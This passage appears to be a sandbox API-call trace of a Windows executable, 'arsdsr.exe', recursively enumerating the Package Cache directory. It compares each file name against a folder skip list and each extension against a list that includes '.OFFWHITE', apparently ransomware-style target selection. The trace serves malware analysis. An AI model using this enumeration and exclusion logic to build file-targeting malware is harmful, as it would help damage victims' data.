Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\") returned="C:/Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\" [0148.453] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\", lpString2="vcRuntimeAdditional_amd64" | out: lpString1="C:/Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64") returned="C:/Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64" [0148.453] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\") returned="C:/Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\" [0148.453] lstrcpyW (in: lpString1=0x295d670, lpString2="C:/Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\") returned="C:/Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\" [0148.453] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\*.*") returned="C:/Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\*.*" [0148.453] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\*.*", lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a20bca0, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x1a257f60, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x1a257f60, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xc000be, dwReserved1=0x295dcf0, cFileName=".", cAlternateFileName="")) returned 0x544750 [0148.453] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0148.453] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a20bca0, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x1a257f60, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x1a257f60, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xc000be, dwReserved1=0x295dcf0, cFileName="..", cAlternateFileName="")) returned 1 [0148.453] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0148.453] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0148.453] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c9b1b00, ftCreationTime.dwHighDateTime=0x1cf3dd2, ftLastAccessTime.dwLowDateTime=0x7c9b1b00, ftLastAccessTime.dwHighDateTime=0x1cf3dd2, ftLastWriteTime.dwLowDateTime=0x7c9b1b00, ftLastWriteTime.dwHighDateTime=0x1cf3dd2, nFileSizeHigh=0x0, nFileSizeLow=0x554520, dwReserved0=0xc000be, dwReserved1=0x295dcf0, cFileName="cab1.cab", cAlternateFileName="")) returned 1 [0148.453] lstrcmpiW (lpString1="cab1.cab", lpString2=".") returned 1 [0148.453] lstrcmpiW (lpString1="cab1.cab", lpString2="..") returned 1 [0148.453] lstrcmpiW (lpString1="cab1.cab", lpString2="...") returned 1 [0148.454] lstrcmpiW (lpString1="cab1.cab", lpString2="windows") returned -1 [0148.454] lstrcmpiW (lpString1="cab1.cab", lpString2="$recycle.bin") returned 1 [0148.454] lstrcmpiW (lpString1="cab1.cab", lpString2="rsa") returned -1 [0148.454] lstrcmpiW (lpString1="cab1.cab", lpString2="ntuser.dat") returned -1 [0148.454] lstrcmpiW (lpString1="cab1.cab", lpString2="programdata") returned -1 [0148.454] lstrcmpiW (lpString1="cab1.cab", lpString2="appdata") returned 1 [0148.454] lstrcmpiW (lpString1="cab1.cab", lpString2="program files") returned -1 [0148.454] lstrcmpiW (lpString1="cab1.cab", lpString2="program files (x86)") returned -1 [0148.454] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\") returned="C:/Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\" [0148.454] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\", lpString2="cab1.cab" | out: lpString1="C:/Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab") returned="C:/Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" [0148.454] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0148.454] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0148.454] PathFindExtensionW (pszPath="cab1.cab") returned=".cab" [0148.454] lstrcmpiW (lpString1=".cab", lpString2=".exe") returned -1 [0148.454] lstrcmpiW (lpString1=".cab", lpString2=".log") returned -1 [0148.454] lstrcmpiW (lpString1=".cab", lpString2=".cab") returned 0 [0148.454] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7a38c100, ftCreationTime.dwHighDateTime=0x1cf3dd2, ftLastAccessTime.dwLowDateTime=0x7a38c100, ftLastAccessTime.dwHighDateTime=0x1cf3dd2, ftLastWriteTime.dwLowDateTime=0x7a38c100, ftLastWriteTime.dwHighDateTime=0x1cf3dd2, nFileSizeHigh=0x0, nFileSizeLow=0x23000, dwReserved0=0xc000be, dwReserved1=0x295dcf0, cFileName="vc_runtimeAdditional_x64.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 1 [0148.454] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2=".") returned 1 [0148.454] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2="..") returned 1 [0148.454] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2="...") returned 1 [0148.454] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2="windows") returned -1 [0148.454] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2="$recycle.bin") returned 1 [0148.454] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2="rsa") returned 1 [0148.454] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2="ntuser.dat") returned 1 [0148.454] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2="programdata") returned 1 [0148.454] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2="appdata") returned 1 [0148.455] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2="program files") returned 1 [0148.455] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2="program files (x86)") returned 1 [0148.455] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\") returned="C:/Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\" [0148.455] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\", lpString2="vc_runtimeAdditional_x64.msi" | out: lpString1="C:/Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi") returned="C:/Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi" [0148.455] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0148.455] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0148.455] PathFindExtensionW (pszPath="vc_runtimeAdditional_x64.msi") returned=".msi" [0148.455] lstrcmpiW (lpString1=".msi", lpString2=".exe") returned 1 [0148.455] lstrcmpiW (lpString1=".msi", lpString2=".log") returned 1 [0148.455] lstrcmpiW (lpString1=".msi", lpString2=".cab") returned 1 [0148.455] lstrcmpiW (lpString1=".msi", lpString2=".cmd") returned 1 [0148.455] lstrcmpiW (lpString1=".msi", lpString2=".com") returned 1 [0148.455] lstrcmpiW (lpString1=".msi", lpString2=".cpl") returned 1 [0148.455] lstrcmpiW (lpString1=".msi", lpString2=".ini") returned 1 [0148.455] lstrcmpiW (lpString1=".msi", lpString2=".dll") returned 1 [0148.455] lstrcmpiW (lpString1=".msi", lpString2=".url") returned -1 [0148.455] lstrcmpiW (lpString1=".msi", lpString2=".ttf") returned -1 [0148.455] lstrcmpiW (lpString1=".msi", lpString2=".mp3") returned 1 [0148.455] lstrcmpiW (lpString1=".msi", lpString2=".pif") returned -1 [0148.455] lstrcmpiW (lpString1=".msi", lpString2=".mp4") returned 1 [0148.455] lstrcmpiW (lpString1=".msi", lpString2=".OFFWHITE") returned -1 [0148.455] lstrcmpiW (lpString1=".msi", lpString2=".msi") returned 0 [0148.455] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7a38c100, ftCreationTime.dwHighDateTime=0x1cf3dd2, ftLastAccessTime.dwLowDateTime=0x7a38c100, ftLastAccessTime.dwHighDateTime=0x1cf3dd2, ftLastWriteTime.dwLowDateTime=0x7a38c100, ftLastWriteTime.dwHighDateTime=0x1cf3dd2, nFileSizeHigh=0x0, nFileSizeLow=0x23000, dwReserved0=0xc000be, dwReserved1=0x295dcf0, cFileName="vc_runtimeAdditional_x64.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 0 [0148.455] FindClose (in: hFindFile=0x544750 | out: hFindFile=0x544750) returned 1 [0148.455] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a20bca0, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x1a257f60, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x1a257f60, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xae00ac, dwReserved1=0x295e370, cFileName="vcRuntimeAdditional_amd64", cAlternateFileName="VCRUNT~1")) returned 0 [0148.456] FindClose (in: hFindFile=0x544590 | out: hFindFile=0x544590) returned 1 [0148.456] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a20bca0, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x1a20bca0, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x1a20bca0, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4a0048, dwReserved1=0x295e9f0, cFileName="packages", cAlternateFileName="")) returned 0 [0148.456] FindClose (in: hFindFile=0x544650 | out: hFindFile=0x544650) returned 1 [0148.456] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a199880, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x1a1e5b40, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x1a1e5b40, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2e002c, dwReserved1=0x295f070, cFileName="{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005", cAlternateFileName="{A749D~1.210")) returned 1 [0148.456] lstrcmpiW (lpString1="{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005", lpString2=".") returned 1 [0148.456] lstrcmpiW (lpString1="{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005", lpString2="..") returned 1 [0148.456] lstrcmpiW (lpString1="{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005", lpString2="...") returned 1 [0148.456] lstrcmpiW (lpString1="{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005", lpString2="windows") returned -1 [0148.456] lstrcmpiW (lpString1="{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005", lpString2="$recycle.bin") returned 1 [0148.456] lstrcmpiW (lpString1="{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005", lpString2="rsa") returned -1 [0148.456] lstrcmpiW (lpString1="{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005", lpString2="ntuser.dat") returned -1 [0148.456] lstrcmpiW (lpString1="{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005", lpString2="programdata") returned -1 [0148.456] lstrcmpiW (lpString1="{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005", lpString2="appdata") returned -1 [0148.456] lstrcmpiW (lpString1="{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005", lpString2="program files") returned -1 [0148.456] lstrcmpiW (lpString1="{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005", lpString2="program files (x86)") returned -1 [0148.456] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\All Users\\Package Cache\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\") returned="C:/Users\\All Users\\Package Cache\\" [0148.456] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\", lpString2="{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005" | out: lpString1="C:/Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005") returned="C:/Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005" [0148.456] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\") returned="C:/Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\" [0148.456] lstrcpyW (in: lpString1=0x295e370, lpString2="C:/Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\") returned="C:/Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\" [0148.456] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\*.*") returned="C:/Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\*.*" [0148.456] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\*.*", lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a199880, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x1a1e5b40, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x1a1e5b40, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4a0048, dwReserved1=0x295e9f0, cFileName=".", cAlternateFileName="")) returned 0x544650 [0148.457] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0148.457] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a199880, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x1a1e5b40, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x1a1e5b40, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4a0048, dwReserved1=0x295e9f0, cFileName="..", cAlternateFileName="")) returned 1 [0148.458] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0148.458] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0148.458] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a1e5b40, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x1a1e5b40, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x1a1e5b40, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4a0048, dwReserved1=0x295e9f0, cFileName="packages", cAlternateFileName="")) returned 1 [0148.458] lstrcmpiW (lpString1="packages", lpString2=".") returned 1 [0148.458] lstrcmpiW (lpString1="packages", lpString2="..") returned 1 [0148.458] lstrcmpiW (lpString1="packages", lpString2="...") returned 1 [0148.458] lstrcmpiW (lpString1="packages", lpString2="windows") returned -1 [0148.458] lstrcmpiW (lpString1="packages", lpString2="$recycle.bin") returned 1 [0148.458] lstrcmpiW (lpString1="packages", lpString2="rsa") returned -1 [0148.458] lstrcmpiW (lpString1="packages", lpString2="ntuser.dat") returned 1 [0148.458] lstrcmpiW (lpString1="packages", lpString2="programdata") returned -1 [0148.458] lstrcmpiW (lpString1="packages", lpString2="appdata") returned 1 [0148.458] lstrcmpiW (lpString1="packages", lpString2="program files") returned -1 [0148.458] lstrcmpiW (lpString1="packages", lpString2="program files (x86)") returned -1 [0148.458] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\") returned="C:/Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\" [0148.458] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\", lpString2="packages" | out: lpString1="C:/Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages") returned="C:/Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages" [0148.458] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\") returned="C:/Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\" [0148.458] lstrcpyW (in: lpString1=0x295dcf0, lpString2="C:/Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\") returned="C:/Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\" [0148.458] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\*.*") returned="C:/Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\*.*" [0148.458] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\*.*", lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a1e5b40, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x1a1e5b40, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x1a1e5b40, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xae00ac, dwReserved1=0x295e370, cFileName=".", cAlternateFileName="")) returned 0x544590 [0148.459] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0148.459] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a1e5b40, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x1a1e5b40, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x1a1e5b40, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xae00ac, dwReserved1=0x295e370, cFileName="..", cAlternateFileName="")) returned 1 [0148.459] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0148.459] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0148.459] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a1e5b40, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x1a1e5b40, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x1a1e5b40, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xae00ac, dwReserved1=0x295e370, cFileName="vcRuntimeMinimum_amd64", cAlternateFileName="VCRUNT~1")) returned 1 [0148.459] lstrcmpiW (lpString1="vcRuntimeMinimum_amd64", lpString2=".") returned 1 [0148.459] lstrcmpiW (lpString1="vcRuntimeMinimum_amd64", lpString2="..") returned 1 [0148.459] lstrcmpiW (lpString1="vcRuntimeMinimum_amd64", lpString2="...") returned 1 [0148.459] lstrcmpiW (lpString1="vcRuntimeMinimum_amd64", lpString2="windows") returned -1 [0148.459] lstrcmpiW (lpString1="vcRuntimeMinimum_amd64", lpString2="$recycle.bin") returned 1 [0148.459] lstrcmpiW (lpString1="vcRuntimeMinimum_amd64", lpString2="rsa") returned 1 [0148.459] lstrcmpiW (lpString1="vcRuntimeMinimum_amd64", lpString2="ntuser.dat") returned 1 [0148.459] lstrcmpiW (lpString1="vcRuntimeMinimum_amd64", lpString2="programdata") returned 1 [0148.459] lstrcmpiW (lpString1="vcRuntimeMinimum_amd64", lpString2="appdata") returned 1 [0148.459] lstrcmpiW (lpString1="vcRuntimeMinimum_amd64", lpString2="program files") returned 1 [0148.459] lstrcmpiW (lpString1="vcRuntimeMinimum_amd64", lpString2="program files (x86)") returned 1 [0148.459] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\") returned="C:/Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\" [0148.459] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\", lpString2="vcRuntimeMinimum_amd64" | out: lpString1="C:/Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64") returned="C:/Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64" [0148.459] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\") returned="C:/Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\" [0148.459] lstrcpyW (in: lpString1=0x295d670, lpString2="C:/Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\") returned="C:/Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\" [0148.459] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\*.*") returned="C:/Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\*.*" [0148.459] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\*.*", lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a1e5b40, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x1a1e5b40, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x1a1e5b40, 